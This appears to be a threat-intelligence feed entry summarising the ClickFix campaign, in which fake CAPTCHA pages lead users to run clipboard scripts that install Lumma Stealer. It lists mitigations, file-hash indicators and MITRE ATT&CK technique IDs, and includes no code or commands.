Behind the CAPTCHA: A Clever Gateway of Malware
Sept. 24, 2024, 2:38 p.m.
Tags
External References
Description
A sophisticated infection chain dubbed ClickFix has been observed using fake CAPTCHA pages to distribute Lumma Stealer malware. The campaign targets multiple countries through two main vectors: cracked game download URLs and phishing emails impersonating GitHub. Users are tricked into executing malicious scripts copied to their clipboards, leading to malware installation. The attack employs multi-layered encryption and leverages mshta to bypass detection. Mitigation strategies include user education, robust email filtering, and keeping systems updated. The global reach and deceptive tactics highlight the evolving nature of cyber threats.
Date
Published: Sept. 24, 2024, 2:07 p.m.
Created: Sept. 24, 2024, 2:07 p.m.
Modified: Sept. 24, 2024, 2:38 p.m.
Indicators
bbf7154f14d736f0c8491fb9fb44d2f179cdb02d34ab54c04466fa0702ea7d55
fa58022d69ca123cbc1bef13467d6853b2d55b12563afdbb81fc64b0d8a1d511
632816db4e3642c8f0950250180dfffe3d37dca7219492f9557faf0ed78ced7c
19d04a09e2b691f4fb3c2111d308dcfa2651328dfddef701d86c726dce4a334a
d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207
cc29f33c1450e19b9632ec768ad4c8c6adbf35adaa3e1de5e19b2213d5cc9a54
b6a016ef240d94f86e20339c0093a8fa377767094276730acd96d878e0e1d624
Attack Patterns
Lumma Stealer
AsyncRAT
T1048
T1074
T1553.005
T1059.001
T1567
T1012
T1005
T1082
T1083
T1204
T1140
T1132
T1027
T1566